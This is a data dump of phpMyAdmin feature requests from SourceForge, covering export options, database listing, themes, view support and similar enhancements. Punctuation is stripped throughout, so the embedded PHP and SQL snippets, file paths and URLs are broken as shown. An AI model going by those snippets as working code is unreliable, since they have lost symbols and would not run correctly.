Original URL https sourceforge.net p phpmyadmin feature requests 816 https sourceforge.net p phpmyadmin feature requests 816 Original author olafvdspek","enhancement"
"24444","5516","7 zip download archives and BitTorrent.
Hello, I am wondering if the phpMyAdmin downloads on sourceforge will offer .7z archives in addition to the current .zip, .tar.gz and .tar.bz2 archives.
The size of phpMyAdmin 2.7.0 beta1.7z is 1477 kB, compared to the 1877 kB of phpMyAdmin 2.7.0 beta1.tar.bz2 a saving of 21 percent solid, Ultra) http 7 zip.org Bandwidth is expensive, and there are new standards to save it like 7 zip and BitTorrent.
By the way, PostgreSQL offers most downloads as .torrents, too http www.postgresql.org ftp source v8.1.0 Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin feature requests 817 https sourceforge.net p phpmyadmin feature requests 817 Original author rele","enhancement"
"24444","5517","Website target= blank.
Hi, Would it be possible to drop every target= blank that causes a new window to be opened on the phpMyAdmin website itself?
Original URL https sourceforge.net p phpmyadmin feature requests 818 https sourceforge.net p phpmyadmin feature requests 818 Original author olafvdspek","enhancement"
"24444","5518","Add option to disable table empty check.
Hi, If a table is empty, the browse and truncate commands are disabled.
I d like an option to disable this check as I frequently truncate a table and then insert data in another process.
Original URL https sourceforge.net p phpmyadmin feature requests 819 https sourceforge.net p phpmyadmin feature requests 819 Original author olafvdspek","enhancement"
"24444","5519","SQL >Support for Called Procedures.
Return and display the results set of a stored procedure where the output of the stored procedure is the same as an sql select statement.
Original URL https sourceforge.net p phpmyadmin feature requests 820 https sourceforge.net p phpmyadmin feature requests 820 Original author tllong","enhancement"
"24444","5520","Drop PMA setFontSizes ).
Drop PMA setFontSizes ) as discussed on mailing list.
Targetted on 2.7.1.
Original URL https sourceforge.net p phpmyadmin feature requests 821 https sourceforge.net p phpmyadmin feature requests 821 Original author nijel","enhancement"
"24444","5521","do not change to database in query as option.
If you uses more than one full qualified database name in a SQL Statement.
i.e.
SELECT FROM testdb1.test INNER JOIN testdb2.test ON testdb1.test.id = testdb2.test.id The selected database testdb2) is switched to testdb1.
Please don t tell me that s a feature!
Original URL https sourceforge.net p phpmyadmin feature requests 822 https sourceforge.net p phpmyadmin feature requests 822 Original author zotteltier de","enhancement"
"24444","5522","the listing of many databases on phpMyAdmin.
A feature I recently came up with that I personally could do with is to have the listing under the following line on the web browser be more enhanced.
Please select a database I am about to add over 250 new databases onto the list of databases we run on our websites.
Even if I logged in with my own login I would still need to deal with a list of over 300 databases old ones plus the 250 new ones I am adding, so the existing feature of giving me a personal login other than the root login is not suitable.
My idea probably needs a rethink on how phpMyAdmin displays on the screen, and I think that splitting the functionality of database listing the left column has would help.
In this column is listed the 10 most recent databases worked on and then it lists a link to another page where the real listing power goes on.
The listing format in the main column would be something like this Please select a database database1 database2 database3 database4 database5 database6 database7 database8 database9 database10 Select other databases lt; that s a hyperlink to page two of the database listing I know there is a databases link on the index page which takes you to the page where you can check privileges phpadmin server databases.php ) but this page is not what I am after.
Nor am I after the existing user management already in the software.
I am after a tool that will allow me to organise and manage my many databases by grouping them by website, e.g.
if of the above databases number 3, 4 and 5 were for website wibble.com and 1, 6 and 10 for wobble.com I can tick them on the list on the page and assign a common name for them.
I would type in the name I assign the group.
Now when I look at the Please select a database listing it would look like this Please select a database wibble.com database3 database4 database5 wobble.com database1 database6 database10 Not Assigned database2 database7 database8 database9 Select other databases As you can see the listing has changed such that I can now see which databases belong to which website.
A further function is for me to be able to hide and unhide databases from this listing.
Similar to the ability to assign access privileges so that I only I can access a database, but not my colleague.
This function can be applied on the Select other databases page to allow to hide any databases I am not working on.
So for example if I am updating databases for wobble.com, I can select the Hide database option on the page while I am assigning it to a group.
Maybe it would want a page for editing this instead.
Once it s marked to hide, it does not show on the main listing, plus I can also hide any databases not assigned as well.
So if I applied that I do not want to see wobble.com or not assigned databases, the listing would look like this Please select a database wibble.com database3 database4 database5 Select other databases However if you have many databases for a single website for example if you just got one website or many websites with many databases), it would also be worthwhile to further group databases for a group by functionality, so if you had this functionality as well, I could then group relevant databases for wibble.com AND sub group them further.
Please select a database wibble.com usermanagement database3 products database4 database5 Select other databases A reset button on the Select other databases page resets ALL groups at once, with window to confirm whether you want to do this.
I think this will be a major improvement to a product that is already very useful, and I hope it will be taken under consideration for the next major update.
Original URL https sourceforge.net p phpmyadmin feature requests 823 https sourceforge.net p phpmyadmin feature requests 823 Original author nmforste","enhancement"
"24444","5523","Use common server list on cookie auth.
Cookie auth should use libraries select server.lib.php and not own version of same code.
Original URL https sourceforge.net p phpmyadmin feature requests 825 https sourceforge.net p phpmyadmin feature requests 825 Original author nijel","enhancement"
"24444","5524","Improve help for filename on export.
It is confusing to mention TABLE on database server export, people thinkt it should work.
Either we should use first selected table for it or modify help message.
Original URL https sourceforge.net p phpmyadmin feature requests 824 https sourceforge.net p phpmyadmin feature requests 824 Original author nijel","enhancement"
"24444","5525","Column comments make editable more visible.
PhpMyAdmin now has basic support for column comments, which is very welcome http www.phpmyadmin.net home page downloads.php?
relnotes=3 However, this only extends to readability when listing the data dictionary in db datadict.php ).
Given that MySQL 4.1 now supports native column comments, it would be very useful indeed to be able to add edit these directly in MySQL.
1) It would certainly be good to show them when listing the table properties tbl properties structure.php 2) However, more importantly, the ability to create the comments in the first place, in tbl create.php 3) and when editing column names, as in tbl alter.php Comments seem to be very much the same as any other of the metadata like NULL,Extra,Default, etc) associated with a column, so presumably the code need not be too difficult to introduce.
I for one would find this an extremely useful addition to PhpMyAdmin.
Original URL https sourceforge.net p phpmyadmin feature requests 826 https sourceforge.net p phpmyadmin feature requests 826 Original author mvl22","enhancement"
"24444","5526","Export Large Database to Multiple files.
I would like to export an entire database into one zip file, but have multiple files within the zip, one for each database table.
Original URL https sourceforge.net p phpmyadmin feature requests 827 https sourceforge.net p phpmyadmin feature requests 827 Original author tllong","enhancement"
"24444","5527","New style form for cookie login.
Cookie login should use same form style as other places.
Original URL https sourceforge.net p phpmyadmin feature requests 829 https sourceforge.net p phpmyadmin feature requests 829 Original author nijel","enhancement"
"24444","5528","Views are shown with 0 columns in the left pane tooltip.
When using views in a database, phpMyAdmin 2.6.3 pl1 shows 0 columns in the tooltip mouseover) for a view.
Here s the code to add a workaround for that.
Around line 482 directly after tmp[ Comment ] = cfg[ ShowTooltipAliasTB ] cfg[ ShowTooltipAliasTB ] !== nested ?
tmp[ Name ] tmp[ Comment ]); Add the following code if tmp[ Rows ] == NULL PMA MYSQL INT VERSION gt;= 50000 strtolower tmp[ Comment ]) == view ) \{ result2 = PMA DBI try query SELECT COUNT ) FROM .PMA backquote db).
.
.PMA backquote tmp[ Name ])); tmp2 = PMA DBI fetch assoc result2); if is array tmp2)) \{ tmp[ Rows ] = tmp2[ COUNT ) ]; \} \} This workaround uses an additional query to execute a count ) on a view.
This might cause performance problems if the view is huge, but I haven t tested it with large datasets.
Original URL https sourceforge.net p phpmyadmin feature requests 830 https sourceforge.net p phpmyadmin feature requests 830 Original author timo h","enhancement"
"24444","5529","More sensible error messages from CSV parser.
CSV parser can in most cases tell error or at least suggest solution.
This should be used in error messages.
Original URL https sourceforge.net p phpmyadmin feature requests 828 https sourceforge.net p phpmyadmin feature requests 828 Original author nijel","enhancement"
"24444","5530","Themes download link.
On separate themes page, there could be link for downloading that would lead to filtered list of themes for current version.
Original URL https sourceforge.net p phpmyadmin feature requests 831 https sourceforge.net p phpmyadmin feature requests 831 Original author nijel","enhancement"
"24444","5531","Possibility to hide create new database form.
Playing with 2.7.0 RC1, I d like to see some more options for config.inc.php 1 I don t want phpMyAdmin to display the name of the host its running on.
It does this in the following string MySQL 4.0.24 log running on MySpecialDatabase as theusername the.php.host 2 I don t want the database server s name to appear anywhere , I ve set the display name to MyDB , but it keeps displaying MyDB | lt;nameofserver gt; in the title bar.
3 Currently it displays Create new database Documentation No Privileges On the main screen.
I don t even want that displayed.
4 How do I prevent phpMA from displaying these links Show MySQL runtime information Show MySQL system variables Original URL https sourceforge.net p phpmyadmin feature requests 832 https sourceforge.net p phpmyadmin feature requests 832 Original author joho68","enhancement"
"24444","5532","inconsistent coding standard again.
i once submit a bug about coding inconsistent problem, and it s accepted nicely.
if ...) to if ...) foreach ...) to foreach ...) but now i see something similar again.
reason phpmyadmin claim itself as a example for php begginers.
problem coding standard is not consistent actual code func arg, arg) verus func arg, arg ) in server processlist.php most pma programmer write the former, except cybot tm who write the latter format ====== 2.0 nijel 18 Nov 03) if !empty kill)) \{ 2.5 rabus 22 Jan 04) if PMA DBI try query KILL .
kill .
; )) \{ 2.0 nijel 18 Nov 03) message = sprintf strThreadSuccessfullyKilled, kill); 2.0 nijel 18 Nov 03) \} else \{ 2.0 nijel 18 Nov 03) message = sprintf strCouldNotKill, kill); 2.0 nijel 18 Nov 03) \} 2.0 nijel 18 Nov 03) \} ====== 2.12 cybot tm 13 Oct 05) sql query = SHOW .
empty full ) ?
FULL ) .
PROCESSLIST ; 2.12 cybot tm 13 Oct 05) serverProcesses = PMA DBI fetch result sql query ); 2.0 nijel 18 Nov 03) 2.12 cybot tm 13 Oct 05) PMA showMessage GLOBALS[ strSuccess ] ); arg,arg vs arg, arg in libraries common.lib.php ====== 2.226 cybot tm 28 Nov 05) path = preg replace \.\.
, .
, path); ====== 2.226 cybot tm 28 Nov 05) if is array db tooltip ) ) \{ 2.226 cybot tm 28 Nov 05) db tooltip = implode , db tooltip ); 2.226 cybot tm 28 Nov 05) \} Original URL https sourceforge.net p phpmyadmin feature requests 833 https sourceforge.net p phpmyadmin feature requests 833 Original author xuefer","enhancement"
"24444","5533","Exit logout from ALL servers.
Hi!
Thanks for a very good piece of software.
I m running 2.7.0 rc1 right now.
Here s my suggestion I would like to see another Exit button, e.g.
Logout All which logs one out from all servers that one is logged in to, not just the current one.
If, for example, you log in to server 1, then choose server 2 in the dropdown menu, and log on to server 2, and then click on the Exit button Logout link), you get logged out of server 2, but remain logged in to server 1.
Thanks in advance!
Best regards, Bjxc3xb6rn Wiberg Uppsala University IT Support Department Uppsala, Sweden Original URL https sourceforge.net p phpmyadmin feature requests 834 https sourceforge.net p phpmyadmin feature requests 834 Original author bwiberg","enhancement"
"24444","5534","Possibility to hide database.
I would like to have an option of cfg[ Servers ][ i][ nevershow db ] = ; this would allow phpMyAdmin to show all the database but the ones you listed.
I never want to see database mysql and information schema, but i hate adding the rest of my databases to cfg[ Servers ][ i][ only db ] Just an idea to think about.
Original URL https sourceforge.net p phpmyadmin feature requests 835 https sourceforge.net p phpmyadmin feature requests 835 Original author ocsurf","enhancement"
"24444","5535","Same layout for all operations.
Currently some actions on operations tab use table layout and some new fieldset one.
We should use only one of those http pma.cihar.com HEAD db operations.php?db=mysql Original URL https sourceforge.net p phpmyadmin feature requests 836 https sourceforge.net p phpmyadmin feature requests 836 Original author nijel","enhancement"
"24444","5536","Enable complete and extended insert by default.
Hi, Would it be possible to enable complete and extended insert options by default?
Greetings, Olaf Original URL https sourceforge.net p phpmyadmin feature requests 837 https sourceforge.net p phpmyadmin feature requests 837 Original author olafvdspek","enhancement"
"24444","5537","Drop left font family and right font family.
Those are used only in original theme.
As discussed on maling list, it can be safely dropped.
Original URL https sourceforge.net p phpmyadmin feature requests 840 https sourceforge.net p phpmyadmin feature requests 840 Original author nijel","enhancement"
"24444","5538","Save tables selected for export.
It would be great to have an option to save the tables, one selected for export in a cookie or somewhere else so that these tables are preselected when the user comes back to the export page.
Original URL https sourceforge.net p phpmyadmin feature requests 841 https sourceforge.net p phpmyadmin feature requests 841 Original author nohn","enhancement"
"24444","5539","Scrollable table list in left frame.
While losing query frame we lost possibility to quickly navigate using icons and in light mode even quickly changing database.
I think table list should be in scrollbox using remaining height of window.
However I have no idea how to implement it ).
Original URL https sourceforge.net p phpmyadmin feature requests 842 https sourceforge.net p phpmyadmin feature requests 842 Original author nijel","enhancement"
"24444","5540","Patch to enable configuration of memory limit.
Goal import export may require more memory than other scripts.
This patch enables more memory for these two scripts only related to cfg[ ExecTimeLimit ]) Affected scripts \ config.inc.php Id config.default.php,v 2.20.2.1 2005 11 23 10 34 32 nijel Exp \ import.php Id import.php,v 2.10 2005 11 18 12 50 49 cybot tm Exp \ export.php Id export.php,v 2.30 2005 11 18 12 50 49 cybot tm Exp Changes based on version 2.7.0 =============================== 1) config.inc.php add after cfg[ ExecTimeLimit ] cfg[ MemoryLimit ] = 16M ; memory limit for import.php and export.php 2) import.php replace OLD set time limit cfg[ ExecTimeLimit ]); NEW if !get cfg var safe mode ))\{ set time limit cfg[ ExecTimeLimit ]); ini set memory limit , cfg[ MemoryLimit ]); \} 3) export.php replace OLD Increase time limit for script execution and initializes some variables set time limit cfg[ ExecTimeLimit ]); NEW Increase memory and time limit for script execution and initializes some variables if !get cfg var safe mode ))\{ set time limit cfg[ ExecTimeLimit ]); ini set memory limit , cfg[ MemoryLimit ]); \} Original URL https sourceforge.net p phpmyadmin feature requests 838 https sourceforge.net p phpmyadmin feature requests 838 Original author jamaz","enhancement"
"24444","5541","Export structure as alter table.
Hi, Would it be possible to add an option to export table structures as single alter table statements?
That s quite handy if you want to update a table structure to the next version .
Original URL https sourceforge.net p phpmyadmin feature requests 839 https sourceforge.net p phpmyadmin feature requests 839 Original author olafvdspek","enhancement"
"24444","5542","Backquote database name in USE.
Current MySQL accepts backquoting, so unless there is some compalibility chosen, database name should be backquoted.
Original URL https sourceforge.net p phpmyadmin feature requests 843 https sourceforge.net p phpmyadmin feature requests 843 Original author nijel","enhancement"
"24444","5543","Structure in PDF export.
PDF export could also show table structure see LaTex or Word exports for example).
Original URL https sourceforge.net p phpmyadmin feature requests 844 https sourceforge.net p phpmyadmin feature requests 844 Original author nijel","enhancement"
"24444","5544","Improve documentation look.
Right now documentaion looks quite different to any style we use elsewhere.
I think that it should use either simmilar to web site or original theme.
Independet on this, anchors do not show correctly as part of text is hidden by top menu.
Original URL https sourceforge.net p phpmyadmin feature requests 851 https sourceforge.net p phpmyadmin feature requests 851 Original author nijel","enhancement"
"24444","5545","New config variable to hold session save path.
I found it necessary to hardcode the session start path just before session start ) in libraries session.inc.php e.g.
session save path nfs cust 8 73 26 462378 web tmp ); This is because my host uses multiple servers such that session cookies get lost unless this path is declared in one s own space.
The problem occurs even if config is used for authentication rather than cookies.
It would be preferable to have this stored in a config variable .
Marc Delisle found the solution for me thanks Marc).
Original URL https sourceforge.net p phpmyadmin feature requests 845 https sourceforge.net p phpmyadmin feature requests 845 Original author rgdobie","enhancement"
"24444","5546","Convert illegal character by default.
Please add the TRANSLIT parameter to the out charset parameter of the iconv ) function by default!
This would have saved me and probably many other developers hours of grief!
Problem now If your database is likely to contain text copied from Microsoft Word documents, it s very likely that you will get this error message when trying to export or import it with phpMyAdmin Notice iconv ) Detected an illegal character in input string in file.php on line x .
This is because of the evil 0x96 long dash character.
MS Word as default !)
converts all double hyphens into this illegal character.
The solution is either to convert 0x96 dash) into the regular 0x2d hyphen minus), or to append the TRANSLIT try and convert the character) or IGNORE drop the character) parameters to the iconv function.
Read more here http php.net manual en function.iconv.php Thanks for considering this.
Sire404 Original URL https sourceforge.net p phpmyadmin feature requests 846 https sourceforge.net p phpmyadmin feature requests 846 Original author sire404","enhancement"
"24444","5547","Export split archives.
If phpMyAdmin can only import 2048 MB max., why it can not export 2048 MB modules?
Original URL https sourceforge.net p phpmyadmin feature requests 847 https sourceforge.net p phpmyadmin feature requests 847 Original author francisco 2002","enhancement"
"24444","5548","Collation Default.
I don t see a config var to set the default collation.
It would be nice, not sure why it defaults to latin1 and causes errors when doing queries because not compatible with older versions of mysql.
Can you please create a var for default collation language in the phpmyadmin config file so we don t have to set reset every column we add to our tables?
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 848 https sourceforge.net p phpmyadmin feature requests 848 Original author myregistration","enhancement"
"24444","5549","Recommended Server Parameters.
On the runtime information page, it would be good if there was a wizard page with suggestions for tuning server parameters.
Original URL https sourceforge.net p phpmyadmin feature requests 849 https sourceforge.net p phpmyadmin feature requests 849 Original author justmemyself","enhancement"
"24444","5550","Import option to set combatibility.
add an option to set server SQL modes before import f.e.
SET sql mode= MYSQL40 Original URL https sourceforge.net p phpmyadmin feature requests 850 https sourceforge.net p phpmyadmin feature requests 850 Original author cybot tm","enhancement"
"24444","5551","Documentation cleanup.
I think we should updated and clean up documentation and remove obsolete information.
Examples FAQ 1.5 advanced authentication has been used ages ago.
FAQ 1.9 is about bug in almost five years old bug in unsupported PHP version, FAQ 1.13 and 1.14 there is no No SQL query error message in current code.
1.13 looks completely weird to me what has bookmark to do with file uploads?
There are definitely much more.
Original URL https sourceforge.net p phpmyadmin feature requests 852 https sourceforge.net p phpmyadmin feature requests 852 Original author nijel","enhancement"
"24444","5552","column edit.
Now with phpmyadmin I can edit a single record or multiple records.
Could be usefult edit multiple records in the same time with table view.
This feature is a coulm edit , see screen shot.
After Browse user can select one or more columns and edit the filelds.
Original URL https sourceforge.net p phpmyadmin feature requests 853 https sourceforge.net p phpmyadmin feature requests 853 Original author lotabi","enhancement"
"24444","5553","PDF relational schema suggestions.
allow checkbox based multi selection of tables that shall be added to a page, rather than allowing users only to manually select each individual table.
allow manual reordering of table appeareance, so that tables appear in manually customized order allow checkbox based selection and moving copying of selected tables to a different page allow grouping of tables into categories allow users to provide meta information for PDF pages i.e.
title, description, purpose) allow users to customize PDF header footer allow users to merge multiple PDF pages into one comprehensive PDF file allow deletion of multiple PDF pages at once allow configurable line width for relationships between tables fields to emphasize important relationships optionally allow exporting to docbook latex uml) Original URL https sourceforge.net p phpmyadmin feature requests 854 https sourceforge.net p phpmyadmin feature requests 854 Original author uranda","enhancement"
"24444","5554","add div layer for tooltip to create edit table page.
The create edit table fields page is pretty wide, it may not be rendered entirely visible for lower screen resolutions, thus it would seem to make sense to provide each field s name as a div tooltip, so that users won t have to scroll horizontally in order to see what field is associated with a particular entry line.
Original URL https sourceforge.net p phpmyadmin feature requests 855 https sourceforge.net p phpmyadmin feature requests 855 Original author uranda","enhancement"
"24444","5555","Export catch MySQL error messages.
so here is what happened i was coding a fulltext search for a webpage that was supposed to get results from a specific table using the search conditions sent via GET.
the thing itself works well with other tables ive used methods described on http www.phpfreaks.com tutorials 129 2.php) but as i got to one specific, it didnt return any results even tho it should logically).
so i opened up my localhost based PMA and went to check the table.
first thing i wanted to do was recreating the fulltext index for that table.
but as i was removing the old one, i got MySQL error 1005 with cant create table sql something .
then i tried to Repair Table but i got MySQL error 1016 with cant open file tablename.MYI instead.
since then, this error appears every time i try to access this table from the tables list, with no table data displayed.
the last thing i tried to do was exporting the database structure and rebuild the specific table from scratch.
but even tho the database structure went ok without errors displayed), after i opened up the exported .sql file, i noticed that instead of the specific table structure, the file contained the xhtml code that is produced by PMA when error occurs.
now im completely clueless.. i do have a backup of the whole database, but id like to know what where the problem is, in case it appears again in the future.
ideas?
thanks in advance Original URL https sourceforge.net p phpmyadmin feature requests 856 https sourceforge.net p phpmyadmin feature requests 856 Original author shylauda69","enhancement"
"24444","5556","Better page titles.
Hi, At the moment a page title looks like Host Database Table | phpMyAdmin 2.6.4 pl4 Debian 2 On tab and task bars, only the first X characters are shown.
So often I see three buttons localhost .
Would it be possible to reverse the order so that it s like Table Database Host?
It would also be nice to include the domain name of the request URL at the end.
Original URL https sourceforge.net p phpmyadmin feature requests 860 https sourceforge.net p phpmyadmin feature requests 860 Original author olafvdspek","enhancement"
"24444","5557","Regexp replace.
MYSQL itself does not allow updates using regular expressions.
I.e.
find fields using regular expressions, and update the value in the field based on captured strings in the regexp.)
I believe this would be an EXTREMELY useful feature for database maintenance, and should be relatively straightforward to implement in PHP on top of MYSQL s exisiting REGEXP search feature which unfortunately cannot do REGEXP replacments.
Original URL https sourceforge.net p phpmyadmin feature requests 857 https sourceforge.net p phpmyadmin feature requests 857 Original author rrmartin","enhancement"
"24444","5558","save as view procedure.
like save as bookmark add the same for view and procedure Original URL https sourceforge.net p phpmyadmin feature requests 865 https sourceforge.net p phpmyadmin feature requests 865 Original author cybot tm","enhancement"
"24444","5559","Charset names slightly different in IBM AIX iconv.
Hi!
Under IBM AIX, using the IBM supplied iconv library instead of the GNU iconv library, names of character encodings character sets code sets are slightly different; e.g.
iso 8859 1 is called ISO8859 1 .
Would it be possible to have a translation of character encoding names, as this most probably affects iconv ) conversions between e.g.
iso 8859 1 and UTF 8?
See the following support request, for MRBS Meeting Room Booking System) submitted by me http sourceforge.net tracker index.php?func=detail aid=1396789 group id=5113 atid=105113 And the attachment http sourceforge.net tracker download.php?group id=5113 atid=105113 file id=162254 aid=1396789 The parts to borrow from my suggested changes would be the gnu iconv to aix iconv codepage map and the get aix character encoding ) function, and in the case of conversions to from UTF 8, the aix utf8 converters array to ensure that a conversion is possible.
References to IBM documentation is supplied in the comments accompanying those functions arrays.
Many thanks in advance!
Best regards, Bjxc3xb6rn Wiberg Uppsala University IT Support Department Uppsala, Sweden Original URL https sourceforge.net p phpmyadmin feature requests 858 https sourceforge.net p phpmyadmin feature requests 858 Original author bwiberg","enhancement"
"24444","5560","Ajax edit in place suggestion).
It would be nice to be able to edit fields in place using Ajax instead o being redirected to another page.
It may also degrade easily for user with javascript disabled.
Original URL https sourceforge.net p phpmyadmin feature requests 859 https sourceforge.net p phpmyadmin feature requests 859 Original author vientocero","enhancement"
"24444","5561","Simulate UPDATE queries.
A cool feature would be the possibility to simulate a UPDATE query, often I have to run such a query on important data which I naturally backup first), but it would spare a lot of time when the query could be simulated.
An easy fix would be when I have a query like UPDATE `important table` SET `more important row`= newvalue WHERE `more important row`= oldvalue The simulation would be something like SELECT , newvalue as `more important row` FROM `important table` WHERE `more important row`= oldvalue As you can see the simulation is only to check the WHERE part of the query, but may be there are other uses for it?
Original URL https sourceforge.net p phpmyadmin feature requests 861 https sourceforge.net p phpmyadmin feature requests 861 Original author rikmeijer","enhancement"
"24444","5562","group dbs tables by regexp.
group by first char cfg[ group db by regexp ] = .\{1\}) i ; or group by untill cfg[ group db by regexp ] = [ ]) \{1\} i ; first ) gives name of group cfg[ group db by regexp recursive ] = false; true or false cfg[ merge groups if less than ] = 100; merge following groups if they sum with less than given value would result in something like a a database another databse a... 99 more ... o p old dataabse o... 20 more peters databse p... 35 more ... same to tables, this group of tables could appear as different databases in one db group Original URL https sourceforge.net p phpmyadmin feature requests 862 https sourceforge.net p phpmyadmin feature requests 862 Original author cybot tm","enhancement"
"24444","5563","search from the frameset.
the left frame has a button to show all entries in a table and a link to the table structure tab, i think it would be a great help if you could add a search icon there too,...up to now i have to klick either one of the others first.
Original URL https sourceforge.net p phpmyadmin feature requests 870 https sourceforge.net p phpmyadmin feature requests 870 Original author edelmeier","enhancement"
"24444","5564","Comments export.
Hi, i see that there is a great feature recently added about comments .
I now use it everytime, but is it possible when we export a database or table to export only comments, with update only structure update), because i make these changes on dev databases and i would like to have it in my productions dumps.
Structure update con be usefull for types to...
Thanks for you job!
Original URL https sourceforge.net p phpmyadmin feature requests 871 https sourceforge.net p phpmyadmin feature requests 871 Original author jaysee","enhancement"
"24444","5565","Non Framed Version.
I beg you guys, please create non framed version of this wonderful tool.
I am tired of refreshing frames, thus losing all data on whole page.
Please!...
Shehi Azerbaijani language translator of yours) Original URL https sourceforge.net p phpmyadmin feature requests 863 https sourceforge.net p phpmyadmin feature requests 863 Original author shehriyari","enhancement"
"24444","5566","Import data from XML file.
Import into a table the data from an XML file.
Original URL https sourceforge.net p phpmyadmin feature requests 873 https sourceforge.net p phpmyadmin feature requests 873 Original author austindear","enhancement"
"24444","5567","More significant digits in status.
Hi, In server status.php some values are shown as 1 M. Could you show them as 1.
M instead?
That way you always have at least) 3 significant digits.
Original URL https sourceforge.net p phpmyadmin feature requests 874 https sourceforge.net p phpmyadmin feature requests 874 Original author olafvdspek","enhancement"
"24444","5568","Improved view support.
Add support for using the browse and drop function for views also.
MySQL 5.0) Original URL https sourceforge.net p phpmyadmin feature requests 864 https sourceforge.net p phpmyadmin feature requests 864 Original author stadskle","enhancement"
"24444","5569","message for displaying message does not work any longer.
Putting a message = Message ; in config.inc.php to display a message Message ) to all users does not work any longer it did in 2.7.0 pl2).
I m not sure if this variable is supposed to be used, but it was very handy. )
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin feature requests 866 https sourceforge.net p phpmyadmin feature requests 866 Original author bwiberg","enhancement"
"24444","5570","SQL queries in right frame instead of new entire window.
I would wish that the SQL query window would be [configurable to be] opened in the right frame instead of in a new) window, which is the case with a JavaScript enabled browser, or instead of overwriting the entire frameset, which is the case with a non JavaScript enabled browser.
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin feature requests 867 https sourceforge.net p phpmyadmin feature requests 867 Original author bwiberg","enhancement"
"24444","5571","Extended insert, put first row on new line.
Hi, Could you put the first row on a new line instead of on the same line?
Old INSERT INTO `bl` `name`) VALUES a1a ), a1emad24 ), New INSERT INTO `bl` `name`) VALUES a1a ), a1emad24 ), Original URL https sourceforge.net p phpmyadmin feature requests 877 https sourceforge.net p phpmyadmin feature requests 877 Original author olafvdspek","enhancement"
"24444","5572","Databases in left frame list instead of dropdown.
Hi, Could you show the databases as a list instead of as a dropdown if and only if) no database is selected yet?
The databases label is also eating space and probably redundant, so maybe you could remove that too or provide an option to do so).
Original URL https sourceforge.net p phpmyadmin feature requests 878 https sourceforge.net p phpmyadmin feature requests 878 Original author olafvdspek","enhancement"
"24444","5573","reserved word warning.
I would like phpmyadmin to at least warn if I m creating a table with a column name that is on the reserved word list.
http dev.mysql.com doc refman 5.0 en reserved words.html Using some reserved words in MySQL lt; 5 won t cause problems from the database server but should be avoided.
I believe phpmyadmin could help developers not to make bad desisions about database design.
Original URL https sourceforge.net p phpmyadmin feature requests 879 https sourceforge.net p phpmyadmin feature requests 879 Original author jpjp","enhancement"
"24444","5574","phpMyAdmin 2.8.0 rc1 Default theme font too large.
the font used in the default theme for the right frame is way too large!
keep the same font size used in 2.7.x, since lots of scrolling has to be done to see more data.
Original URL https sourceforge.net p phpmyadmin feature requests 881 https sourceforge.net p phpmyadmin feature requests 881 Original author technomike","enhancement"
"24444","5575","bin2hex transform No spaces.
Hi, Could you change the bin2hex transform such that it doesn t insert spaces or add an option to do so)?
Original URL https sourceforge.net p phpmyadmin feature requests 882 https sourceforge.net p phpmyadmin feature requests 882 Original author olafvdspek","enhancement"
"24444","5576","Reload MySQL vs Flush Privileges.
Hi, Why is the Flush Privileges action in the main page called Reload MySQL?
Original URL https sourceforge.net p phpmyadmin feature requests 868 https sourceforge.net p phpmyadmin feature requests 868 Original author olafvdspek","enhancement"
"24444","5577","Run SQL query Allow rollback for InnoDB tables.
When running a DML statement such as update in the SQL window it would be nice to see a checkbox that says Rollback updates deletes when finished .
This would be directly next to or below the existing checkbox Show this query here again This way you could run an update SQL and see the affected rows value without actually committing the transaction.
Seeing the affected rows kinda indicates the relative success or failure of your DML.
Of course, the ability to rollback or commit transaction only applies to InnoDB type tables...
Original URL https sourceforge.net p phpmyadmin feature requests 869 https sourceforge.net p phpmyadmin feature requests 869 Original author jganders","enhancement"
"24444","5578","visulal feat.
request for left bar.
hi!
when using left bar list of tables) a highlight of the selectet table would be good!
yust a simple javascript is nessasary to toggle the link or cell bgcolor.
kind regards flobee Original URL https sourceforge.net p phpmyadmin feature requests 872 https sourceforge.net p phpmyadmin feature requests 872 Original author flobee","enhancement"
"24444","5579","Database name above list of tables in left pane.
Previous versions of phpmyadmin had the name of the current database just above the list of tables in the left pane.
This was convenient for me to click out of habbit to return to the main view of the database.
Please restore this or add an option in the config file to restore this because its disappearance is driving me mad!
angelo Original URL https sourceforge.net p phpmyadmin feature requests 875 https sourceforge.net p phpmyadmin feature requests 875 Original author amandato","enhancement"
"24444","5580","SSL status should be less visible.
Hi, Could you hide the InnoDB status if InnoDB isn t loaded?
Original URL https sourceforge.net p phpmyadmin feature requests 876 https sourceforge.net p phpmyadmin feature requests 876 Original author olafvdspek","enhancement"
"24444","5581","Cookie login form too wide.
I think that cookie login should not be over whole page, but just wide enough to hold content.
Original URL https sourceforge.net p phpmyadmin feature requests 890 https sourceforge.net p phpmyadmin feature requests 890 Original author nijel","enhancement"
"24444","5582","Reverse Sorting.
Hi, Could you a way to sort results in reverse for example, by clicking on the column header again)?
Original URL https sourceforge.net p phpmyadmin feature requests 891 https sourceforge.net p phpmyadmin feature requests 891 Original author olafvdspek","enhancement"
"24444","5583","Favourites.
Hello, As webdeveloper I often use phpMyAdmin as a database administration tool and in most of the cases I use it to check record insertion by making queries over and over.
What happens here is that every time I log in I need to go through all those steps to make my queries again, sometimes I keep them in text files so i don t need to write them again.
My idea is to create, maybe a top tab along with those export , empty , drop ... width the name of favourites where we could keep our favourite queries so we don t have do keep writing them over and over.
A way to add a query to favourites would be adding a link, after a query has been made, next to the refresh link.
Thanks in advance and keep it cool, Ivo Silva aka Cyb3rM0nk Original URL https sourceforge.net p phpmyadmin feature requests 880 https sourceforge.net p phpmyadmin feature requests 880 Original author ivosilva","enhancement"
"24444","5584","from unixtime transform.
function PMA transformation text plain from unixtime buffer, options = array ), meta = ) \{ return gmdate Y m d H i s , buffer); \} Original URL https sourceforge.net p phpmyadmin feature requests 883 https sourceforge.net p phpmyadmin feature requests 883 Original author olafvdspek","enhancement"
"24444","5585","Let transforms return tooltips?.
Hi, I think it d be nice if transforms could return optional tooltips.
Either via an extra parameter or via an extra function.
Original URL https sourceforge.net p phpmyadmin feature requests 884 https sourceforge.net p phpmyadmin feature requests 884 Original author olafvdspek","enhancement"
"24444","5586","Import export phpmyadmin meta data.
Meta data like relations and transformations is stored in a separate phpMyAdmin database, but AFAIK there s no tool to import export this data for a single database.
Could such a tool be added?
Manual import export requires removing the primary key fields and maybe changing the database fields.
